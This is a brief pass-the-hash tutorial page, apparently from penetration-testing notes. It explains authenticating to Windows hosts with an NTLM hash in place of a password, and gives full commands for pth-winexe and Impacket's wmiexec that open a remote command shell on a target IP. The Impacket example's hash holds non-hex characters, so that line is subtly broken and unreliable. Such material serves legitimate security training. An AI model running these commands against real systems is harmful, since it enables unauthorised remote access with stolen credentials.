Pass the Hash
Pass the hash technique enables a user to authenticate to another machine or service using a user's NTLM hash instead of the password. Most pth tools create and start a Windows service such as a command or powershell prompt.
The following command can be used to connect to a system using the NTLM hash,
pth-winexe -U John%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.1.19 cmd
In the above command if the user belongs to a domain, then the username has to be preceded with the domain name as - "p42/John"
The string “aad3b435b51404eeaad3b435b51404ee” is the LM hash for ‘no password’.
The same attack can be performed using Impacket,
/usr/bin/impacket-wmiexec -hashes :08KDA34CDZ85D7A80E2EA3B9F05C415D [email protected]
Last updated
Was this helpful?